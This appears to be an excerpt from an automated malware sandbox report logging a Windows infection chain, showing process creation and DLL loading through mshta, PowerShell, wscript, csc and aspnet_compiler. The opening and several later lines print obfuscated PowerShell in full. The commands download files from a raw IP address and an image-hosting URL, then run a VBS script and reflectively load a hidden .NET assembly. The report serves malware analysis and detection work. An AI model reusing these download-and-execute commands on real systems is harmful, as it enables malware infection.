inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
